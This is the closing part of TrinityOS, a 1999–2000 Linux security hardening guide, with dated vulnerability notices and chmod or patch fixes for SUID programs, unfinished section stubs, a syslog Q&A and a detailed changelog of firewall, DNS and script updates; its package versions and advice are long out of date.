super_3.11.7-1.deb patch to fix the security issues announced on 02/15/99 02/21/99 - Zgv has another exploit. Because of this, I recommend to make it only root executable: chmod 0500 /usr/bin/zgv 03/05/99 - There is a root exploit for GNUplot on SuSe distrobutions. For some reason, SuSe installed this program SUID root. Fix this: chmod 755 /usr/bin/gnuplot 03/20/99 - There is a security vunderability in Netscape 4.5.0's "talkback". Netscape 4.51 has removed talkback . Change its perms via "/bin/chmod -R 600 /opt/netscape/talkback" 03/20/99 - There is a SuSE security issue with /proc/kmem Change its perms "/bin/chmod 640 /dev/kmem" 03/28/99 - There is a /tmp race condition that can overwrite files. Until there is a new Xfree version posted, do the following: /bin/rm -rf /tmp/.X11-unix mkdir -p -m 1777 /tmp/.X11-unix 03/30/99 - There are are (4) new patches for Redhat but (2) of them are dependant on the version of Redhat. mutt-0.95.4us-0.i386.rpm pine-3.96-7.1.i386.rpm sysklogd-1.3.31-0.5.i386.rpm zgv-3.0-1.5.0.i386.rpm NOTE: There is a small bug with the sysklogd rpm. Please see ChangeLog date 4/12/99 for more details. 04/19/99 - Installed (3) new RPMs for security reasons: lpr-0.35-0.5.2.i386.rpm procmail-3.13.1-1.i386.rpm rsync-2.3.1-0.i386.rpm 05/03/99 - Older versions of Caldera might make the /etc/shadow file world readable. Update your Coas tool to coas-1.0-8.i386.rpm 05/05/99 - There is a new Bugtraq exploit for Wu-FTP v2.4.2-Beta18 and below called "W00f". Redhat hasn't released a new wu-ftp version so you'll need to install it yourself! ftp://ftp.vr.net/pub/wu-ftpd/binaries/intel/linux/wu-ftpd-2.4.2-vr17-1.i386.rpm 06/1/99 - There is a Y2K issue with Timetool: ftp://updates.redhat.com/5.2/noarch/timetool-2.5-4.noarch.rpm - There is a problem with the newest Apache module for Perl CGIs ftp://updates.redhat.com/5.2/i386/mod_perl-1.19-1.i386.rpm 6/04/99 - Redhat has updated their kernels in RH6.0 for a DoS issue. ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i386.rpm 6/12/99 - Redhat has a new patch for RH6 to monitor stray processes ftp://updates.redhat.com/6.0/i386/utempter-0.5-2.i386.rpm - More fixes for the POP-3 protocol.. ftp://updates.redhat.com/5.2/i386/imap-4.5-0.5.2.i386.rpm 6/18/99 - Redhat released some patches for security issues with some terminal progs on RH6. dev-2.7.7-2.i386.rpm rxvt-2.6.0-2.i386.rpm screen-3.7.6-9.i386.rpm - Redhat also has updated their entire Xwindow package for problem fixes for the font server, race conditions, ISO-8859 char conflicts, No Xauth authentication (ack!), and backspace keymapping issues: XFree86-3.3.3.1-52.i386.rpm, XFree86-100dpi-fonts-3.3.3.1-52.i386.rpm XFree86-75dpi-fonts-3.3.3.1-52.i386.rpm, XFree86-3DLabs-3.3.3.1-52.i386.rpm XFree86-8514-3.3.3.1-52.i386.rpm, XFree86-AGX-3.3.3.1-52.i386.rpm XFree86-FBDev-3.3.3.1-52.i386.rpm, XFree86-I128-3.3.3.1-52.i386.rpm XFree86-Mach32-3.3.3.1-52.i386.rpm, XFree86-Mach64-3.3.3.1-52.i386.rpm XFree86-Mach8-3.3.3.1-52.i386.rpm, XFree86-Mono-3.3.3.1-52.i386.rpm XFree86-P9000-3.3.3.1-52.i386.rpm, XFree86-S3-3.3.3.1-52.i386.rpm XFree86-S3V-3.3.3.1-52.i386.rpm, XFree86-SVGA-3.3.3.1-52.i386.rpm XFree86-VGA16-3.3.3.1-52.i386.rpm, XFree86-W32-3.3.3.1-52.i386.rpm XFree86-XF86Setup-3.3.3.1-52.i386.rpm, XFree86-Xnest-3.3.3.1-52.i386.rpm XFree86-Xvfb-3.3.3.1-52.i386.rpm, XFree86-cyrillic-fonts-3.3.3.1-52.i386.rpm XFree86-devel-3.3.3.1-52.i386.rpm, XFree86-doc-3.3.3.1-52.i386.rpm XFree86-libs-3.3.3.1-52.i386.rpm, XFree86-xfs-3.3.3.1-52.i386.rpm 6/23/99 - Redhat has released a new patch set for KDE on RH6 to bring it to release levels and it also fixes some security issues: Intel: ftp://updates.redhat.com/6.0/i386/ kdeadmin-1.1.1-1.i386.rpm, kdebase-1.1.1-1.i386.rpm, kdegames-1.1.1-1.i386.rpm kdegraphics-1.1.1-1.i386.rpm, kdelibs-1.1.1-1.i386.rpm, kdemultimedia-1.1.1-1.i386.rpm kdenetwork-1.1.1-1.i386.rpm, kdesupport-1.1.1-1.i386.rpm, kdetoys-1.1.1-1.i386.rpm kdeutils-1.1.1-1.i386.rpm, korganizer-1.1.1.i386.rpm - Redhat has release new PHP modules for the Apache WWW server: Intel: ftp://updates.redhat.com/6.0/i386/ mod_php3-3.0.9-1.i386.rpm, mod_php3-imap-3.0.9-1.i386.rpm, mod_php3-manual-3.0.9-1.i386.rpm mod_php3-pgsql-3.0.9-1.i386.rpm 6/24/99 Redhat has released a new set of NFS server and client fixes. nfs-server-2.2beta44.i386.rpm, nfs-server-clients2.2beta44.i386.rpm Redhat has released a new nettools patch to fix security issues: ftp://updates.redhat.com/6.0/i386/net-tools-1.52-2.i386.rpm Redhat has released a new version of Talk to fix issues that they broke in RH6 ftp://updates.redhat.com/6.0/i386/talk-0.11-2.i386.rpm Ack! This is a huge gap eh? 11/15/99 - There is a ROOT exploit against ALL versions of NAMED less than 8.2.2p5. Upgrade your BIND DNS server NOW! 11/19/99 - Added a Buffer overflow fix for NFS nfs-server-2.2beta47-1.i386.rpm nfs-server-clients-2.2beta47-1.i386.rpm - Denial of service attack in syslogd sysklogd-1.3.31-1.5.i386.rpm 12/09/99 - Debian reports a root overflow in htdig which is installed in v2.1 of the distro. 01/17/00 - Added (4) RPMs for security Redhat 6.x: pam-0.68-10.i386.rpm sharutils-4.2.1-1.6.1.i386.rpm usermode-1.18-1.i386.rpm All Redhat: lpr-0.48-0.5.2.i386.rpm 03/26/00 - There are new vunderabilities in several packages: - imwheel-solo has a root exploit and is SUID root. To fix this, run "chmod 755 /usr/X11R6/bin/imwheel-solo" - There is a root exploit in older version of PAM. Please apply the newest patches for your distro. - There is a root exploit in gpm-root. This will be fixed by the maintainer soon but until the, I recomend to disable it with "chmod 700 /usr/bin/gpm-root" - There is a a new FTP Masq module vunerability that can open up ports though a firewall. There was a proposed patch that was posted on Bugtraq. I have submitted an email to Juan Ciarante to hopefully get this patched. - There are several root exploits for the Window Maker CD player called "wmcdplay". If you have this installed, upgrade to a secured version or disable it with "chmod 700 wmcdplay" - There is root exploit for "atsadc". If you have this installed, Upgrade to a secured version or disable it with "chmod 700 atsadc" 03/31/00 - There is a root exploit against the IRC client "ircii". Patch it from your distro's FTP site: Redhat: ircii-4.4M-1.i386.rpm ################################################################################ --- These features have NOT been completed yet --- ################################################################################ ================================================================================ Section - ZIP Drive connected to the parallel port http://www.torque.net/~campbell ================================================================================ ================================================================================ Section - Sound card utilities SoundBlaster 16 mixer WAV player/recorder ================================================================================ Section - System optimization and tuning - Tuning: - IRQTune ================================================================================ Section - WWW Caching Proxy - WWW proxy (Apache or Squid) ================================================================================ Section - Transparent WWW Banner/Ad filtering - WWW Ad banner filtering http://www-math.uni-paderborn.de/~axel/NoShit/index.html patch: http://www.america.com/~chrisf/web/NoShit/WebFilter_0.5.patch.gz Example filter: http://www.america.com/~chrisf/web/NoShit/library.txt ================================================================================ ================================================================================ Section 99 - Common Observations, Q&A, etc #1 - SYSLOG: Many users notice that they get "--MARK--" messages in their SYSLOG files. Why? A: This is a feature of SYSLOG to let you know that its still working though it has nothing to report. If you don't like this behavior (or it was automatically enabled via a RPM update, etc), edit its loading to be something like "syslogd -m 0" Redhat: edit the /etc/rc.d/init.d/syslog file Slackware: edit the /etc/rc.d/rc1.inet file #2 - SYSLOG: Many users notice that they sometimes get the following message: "May 2 04:02:21 rocko kernel: klogd 1.3-3, log source = /proc/kmsg started. May 2 04:02:21 rocko kernel: Inspecting /boot/System.map May 2 04:02:22 rocko kernel: Loaded 4253 symbols from /boot/System.map. May 2 04:02:22 rocko kernel: Symbols match kernel version 2.0.36. May 2 04:02:22 rocko kernel: No module symbols loaded." What is this from? A: This is from Redhat's "logrotate" program restarting the SYSLOG service. No worries.. this is normal. ================================================================================ ================================================================================ Section 100 - ChangeLOG +--------------------------------------------------+ | Notice to all TrinityOS viewers: | | | | - If there are any sections that you would | | like to be added/modified/corrected, etc, | | just let me know! | | | | ** Do you want to get an e-mail when I | | update the TrinityOS doc? Just send an | | e-mail to dranch@trinnet.net with a | | subject of "Add me to your updates list" and | | I'll add you to the list! ** | | | | dranch@trinnet.net | +--------------------------------------------------+ See all prior updates older than 02/21/00 at: http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS-old-updates.wri ************************************************** ** TrinityOS ** ** "CRITICALITY" list ** ************************************************** - This section is for TrinityOS users to better track what TrinityOS changes ARE and AREN'T so IMPORTANT to be fixed on their Linux box Key: ---- *C = CRITICAL: Something CRITICAL means that your are vunerable to attack either due to some new security exploit, an error on my part (firewall rules, etc), or something that should be tested ASAP. I = IMPORTANT: Something IMPORTANT means that these changes will have direct impact on the functionality of your box or is a medium security risk. Not all IMPORTANT things are important to everyone. G = GOOD READ: Something as GOOD READ means that it is informative and will better help you track your machine. N = Not Important: Something NOT IMPORTANT are things like Typo corrections, formatting changes, etc. ======================================================================================= Criticality -- Date What was changed and in what [Section] -------- --------------------------------------------------------------------- ======================================================================================= ------------------------------------------------------------------------------ All of TrinityOS's step-by-step instructions, files, and scripts are fully scripted out for an automatic installation at: http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS-files/TrinityOS-security.tgz ----------------------------------------------------------------------------- N 04/15/00 Fixed all "readible" spelling errors. Thanks to ashley@pcraft.com for catching these. H Updated the sendlgos script. # 04/13/00 - Added the $HOST variable to easily tune the SUBJECT field to # reflect the name of your Linux system. You should edit this # to reflect your system. [Section 9] I Updates the IPCHAINS ruleset to v3.58 -- # v3.58 - 04/13/00 # - Fixed a pretty serious issue if you were trying to enable the explict # input filters for things like DoubleClick, etc. Basically, I was allowing # all internal traffic to get to the Internet before these firewall rules # were being inspected. I have now moved the ALLOW ALL internal firewall # rulesets toward the end of the INPUT section. Thanks to # thomas.stangner@navigon.de for catching this! [Section 10] N Missed the reference for pointing users to the Printing section. [Section 33] N Moved updates older 2/21/00 to the old updates list. The URL is given both ABOVE and below. ------------------ N 04/09/00 Changed the name of the DNS section to reflect that the TrinityOS * Sent documentation now tells users how to setup DNS in both a CHROOTed Update* and SPLIT Zone environment. [Section 2] N Removed the "Edit and move /var/log/sendlogs to /usr/local/sbin" line from the Future Features section. It was already done. [Section 2] N Removed the "Update the DNS setup to be a SPLIT-DNS setup for additional internal security" Future Feature line now that its completed. [Section 2] N Updated the Feature section to reflect that DNS is now done in a both a CHROOTed and SPLIT Zone fashion. [Section 3] I In addition to finding that the copy of Sendlogs in TrinityOS was old compared to the archive, I reversed a change I made a while back. Basically, now dates from 01-09 will now work properly. [Section 9] N Moved all IPCHAINS firewall changelogs older than v3.50 to the old-updates log. The URL is both just above this and at the end of TrinityOS. [Section 10] G Updated the IPCHAINS rc.firewall to v3.57 # - Added some spaces in front of the work "Optional" for # prettier output upon loading. # - I've rearranged the the enabling of FORWARDING # -before- the enabling of MASQUERADING since IPCHAINS # complains. # - As of 2.2.12, the IP_ALWAYS_DEFRAG option has been # omitted and is now a /proc configured option. I # have now added this to the FORWARD section. # - Added an echo statment and additional SILENT blocking # statements for SMB traffic on the external interface [Section 10] N More for a self reminder, I added how to address a NIC in Redhat speak at the end of this section. [Section 16] I Wow! This was a LOT more work than I expected but I've finally updated the DNS section to now configure BIND to be in both a CHROOT'ed jail (for security) and have SPLIT Zones for internal and external internfaces. Please see the section for more details on what all this means. I have also slightly reorganized this section and updated and moved the root-hints script. [Section 24] I I have updated the TrinityOS archive with all this as well. ------------------ N 04/08/00 Added a URL for additional SSH tunneling help. Actually, I just moved it from Section 30 to 5. I did the same for the Security HOWTO from section 8 to 5. [Section 5] G Updated the permissions for the various /etc/cron.* files and also updated them in the TrinityOS-security script. [Section 7] N Moved the changing of permissions of /bin/rpm from the bottom of section 8 to section 9. [Section 7 to 8] N Moved and updated the URL for the Security HOWTO to Section 5. [Section 8] N Updated some of the verbage in the password section section. Also cleaned up and expanded on the daemon enabling/disabling section for both BSD and SysV systems. [Section 8] G Added a note for the /etc/hosts.allow file to only use TCP/IP addresses and NOT DNS names since they can be spoofed. I also added an example in /etc/hosts.allow to allow all hosts on a given subnet. [Section 8] N Fixed two typos in the source directory when moving the logrotate config files for mysql and and squid. [Section 9] N Added changing the permissions of /etc/issue and /etc/issue.net. I've also added this to the script. [Section 9] N Aligned TrinityOS with the script. The "logit" script should be in /root. I also fixed the perms on it. [Section 9] N Added the creation of the apropos database to the TrinityOS script. N Noted that the "makewhatis" command now runs cleanly in Mandrake 7.0. [Section 9] I Holy Cow! The /usr/local/sbin/sendlogs file in TrinityOS was VERY old. Dunno how this escaped me! Sorry! The old version was 11/26/99, the new version is 2/21/00! The version in the TrinityOS archive was ok. [Section 9] N Updated the IPCHAINS firewall rulset to v3.56 # v3.56 - 04/08/00 # - Added the /sbin path to the commented IPCHAINS lines # for setting the TOS bits. [Section 10] N Deleted the changing the permissions of IPFWADM or IPCHAINS since they are duplicated in Section 8. [Section 10] N Noted that the 2.2.x kernels have PORTFW functionality built in. [Section 11] N Updated the top comments that TrinityOS covers the compiling of both 2.2.x and 2.0.x kernels. [Section 12] N Updated and reformtted the section for editing of /sbin/ifup to reflect the line numbers for Mandrake 7. [Section 16] N Added the SSH section to reflect that SecureCRT v3.x supports the SSHv2 protocol. I also noted that SSHv2 is not free for commercial and educational use. Thus, many people still use SSHv1 servers. I also moved the URL for additional tunneling help from Section 30 to Section 5 [Section 30] G Added a SysV script file to load SSHd for Linux systems like Redhat, etc. I also clarified the existing system was for BSD systems like Slackware, etc. I also added a few more configuration options for disabling Xwindows and SSH tunnels. [Section 30] G Added a SysV script file to load SSHd to the TrinityOS-security archive. ------------------ N 04/04/00 ftp.cdrom.com has moved their Linux archives to ftp://ftp.freesoftware.com I have updated the URLs. [Section 5] ------------------ G 04/02/00 Updated the distro section to reflect Redhat 6.2 and my thoughts and worries about Mandrake 7.0's installer. [Section 6] I Added a security alert / patch recommendation for ircii [Section 60] ------------------ N 04/01/00 Updated the name of the email section to to reflect the support of IMAP4 as well. [Section 2] G Added a URL to a HOWTO on the LDP for supporting multple virtual domains for email. [Section 5] G Added a large description of what UUCP, POP3, and IMAP4 are, how they work, and how they are better/worse. I also re-wrote part of it to reflect both POP3 and IMAP4 and IPFWADM and IPCHAINS. [Section 28] N Added a pointer to Section 5 for users that need to setup virtual domains for email. [Section 28] I Fixed a type where I was restarting syslog and NOT crond as I was describing. Thanks to tcropper@tcrop.net for catching this silly mistake. [Section 41] I Fixed a typo in the TrinityOS archive where "touch /etc/dhcpd.leases" had a stray "A" at the end of the line. Thanks to tcropper@tcrop.net for that one. ------------------ I 3/27/00 Updated the IPCHAINS firewall to v3.55 *Sent Update* Deleted the text from the IPCHAINS firewall ruleset and the DHCPcd section: -- # *************************************************************************** # ABSOLUTELY CRITICAL: If you run the /etc/dhcpcd/dhcpcd-ethX.exe file # (needed for DHCP'ed DSL and cablemodem users), # you CANNOT also enable the /etc/rc.d/init.d/firewall # script below. # *************************************************************************** -- The reason for this is that the firewall script file WON'T be executed if the old IP address for the machine was the same after reboot. So, you need to have: Redhat: the /etc/rc.d/init.d/firewall script activated Slackware: have the /etc/rc.d/rc.local script load the /etc/rc.d/rc.firewall ruleset. Please NOTE: ------------ I think there still might be some issues with this setup. The problem stems around the fact that the rc.firewall might get loaded from both dhcpcd's /etc/dhcpcd/dhcpcd-ethX.exe AND /etc/rc.d/init.d/firewall. I'm still looking into this and if you have any comments on this, I'd love to hear from you. [Section 10 and 35] *C* There are -6- new security vunerabilities for Linux that depends on the distro you are running. Check out this section ASAP!! [Section 60] G Updated the TrinityOS archive script to reflect the DHCPcd issues. N Moved all TrinityOS updates older than 01/03/00 to the Changes Archive. The URL is above. ------------------ N 3/25/00 Updated the SSH Url [Section 3] N Fixed a typo where I was calling the "Dial-In Server HOWTO" the "Dial-UP" server HOWTO. [Section 5] G Updated the IPCHAINS firewall to 3.54 - Added filters for the new "Shaft" DDos tools [Section 10] ------------------ I 03/20/00 Found a typo in the /usr/lib/sendmail-cf/cf/trinityos.mc file. Changed "confSTMP" to "confSMTP". Thanks to frank@pineaus.com for this one. [Section 25] ------------------ *C* 03/19/00 I -thought- I solved all the DHCPcd issues but it sounds like DHCP users cannot run both the /etc/rc.d/init.d/firewall and the /etc/dhcpcd/dhcpcd-eth0.exe file. This yeilds BAD results. I have added comments to make DHCP users aware of this in both the IPCHAINS firewall and the DHCP sections. [Section 10, 35] I have changed the enabling the /etc/rc.d/init.d/firewall script from AutoFix to Userfix in the TrinityOS archive script. ------------------ I 03/18/00 Added a top section to clarify why TrinityOS is both Trademarked and Copyrighted: -- Sorry for all the legal stuff... Yet I've already had one company try to have the name TrinityOS taken from me and one HOWTO author has already ripped off MUCH of TrinityOS's content though it was re-written to avoid and direct copyright issue. I'm just covering my butt here from the many lowlifes in the world. -- [Intro] N Updated the URL for Diald Thanks to lourdes@ljones.com for this one. [Section 5] N Tripwire has gone OpenSource for Linux! Woohoo! They have also released a version that runs on Glibc. I've updated the Tripwire section with all the new URLs. Thanks to lourdes@ljones.com for this one. [Section 5] N Added a few URLs for PPPoE [Section 5] N Added a few URLs for PPTP and Encrypted PPTP VPNs [Section 5] G Added a URL to Robert Gram's FAQ on how to understand what Firewall logs mean. [Section 5] N Added a URL for Linux Real Time Messangers (ICQ, AIM, etc) [Section 5] N Deleted the reference to /etc/localhosts. This is OLD stuff. Thanks to lourdes@ljones.com for this one. [Section 7] G Fixed the permission setting locations of klogd and syslogd Thanks to lourdes@ljones.com for this one. [Section 8] G Updated the IPCHAINS rc.firewall ruleset to v3.52 # v3.52 - 03/18/00 # - Finally found a 100% solution for DHCPcd users out there that # get DHCP'ed IP addresses on their external INTERFACE. Changes # in the firewall ruleset is only the DELETION of comments in the # top section to then refer users to the DHCPcd section in TrinityOS # for full details (as it should be to minimize confusion). # # The syntax "dhcpcd -D -H $EXTINT /etc/rc.d/rc.firewall" was WRONG. # # - Moved the PORTFW variabled to be below the SECUREHOST section # for clarity. # # - Added some comments for PORTFW users on how to allow portfw acces # to explict hosts and/or networks. # # - Added two more PORFWIP variabless to the IPCHAINS ruleset # # - Moved the PORFW section from the INPUT section to the FORWARDing # section for better clarity # # - Added a section in the general INPUT section for Squid w/ JunkBuster. # # - Expanded on the DoubleClick filtering example with network numbers from # cwilson@ece.gatech.edu Thanks to bbass@austin.rr.com for helping troubleshoot this for me. [Section 10] G Deleted an extra "#" from the /etc/rc.d/init.d/firewall script that kept it running with Linuxconf. Thanks to frost@engen.com for catching this one. [Section 10] G Updated the IPFWADM rc.firewall ruleset to v2.97 # v2.97 - Deleted the DHCPcd commands as the syntax was old an misleading. # Update to IPCHAINS for a far superior firewall ruleset. [Section 10] G Added a recommendation for users to check out Robert Gram's Firewall hit FAQ to understand what their firewall logs really mean. [Section 10] I Finally found the proper solution to get users that use DHCPcd on their external interfaces to re-run the rc.firewall ruleset upon a lease renew. [Section 35] I Updates to the TrinityOS archives: - Fixed the permission setting locations of klogd and syslogd Thankd to lourdes@ljones.com for catching this. - Fixed an error in the TrinityOS archive where chkconfig was enabling "network" instead of "firewall" in the various /etc/rc.d/rc.Xd dirs. Thanks to tcropper@tcrop.net for catching this one. - Updated the firewall to v3.52 ----------------- N 03/13/00 Added the URL for the DHCPcd homepage [Section 5] ----------------- N 03/05/00 jlhaynes@ieee.org informed me that the Trinity site, the first nuclear test site, wasn't in Nevada but White Planes, New Mexico. Thanks James! N Updated the rc.firewall ruleset to v3.51 - Removed a duplicate input filter for spoofed packets, etc. Interestingly enough, trinityos.wri didn't have the duped line. Thanks to leo@leobutler.com for the sharp eye. [Section 10] N Updated the TrinityOS archive ------------------ N 02/29/00 Updated the proceedures for installing Sendmail manually. Before I did: cp /usr/src/archive/sendmail/sendmail-x.x.x/ /usr/lib/sendmail-cf now it is: mkdir /usr/lib/sendmail-cf tar cpf - /usr/src/archive/sendmail/sendmail-x.x.x/* | (cd /usr/lib/sendmail-cf; tar xvpf -) This fixes an issue where the /usr/lib/sendmail-cf dir isn't already present or when its on the same file system. Thanks to dsuthers@naxs.com for bringing this to my attention. [Section 25] ------------------ N 02/26/99 Updated the IPCHAINS rc.firewall to v3.50 - Fixed a minor error in the commented Diald line were the $INTLAN variable needed to have the extra "/24" deleted. Thanks to jonbir@cogs.susx.ac.uk for reporting this. [Section 10] G Fixed a missing "fi" statement in the TrinityOS-security.sh script that would kill it after the PPP section. **************************************************************************** * All prior updates older than 02/21/00 at: * * * * http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS-old-updates.wri * **************************************************************************** --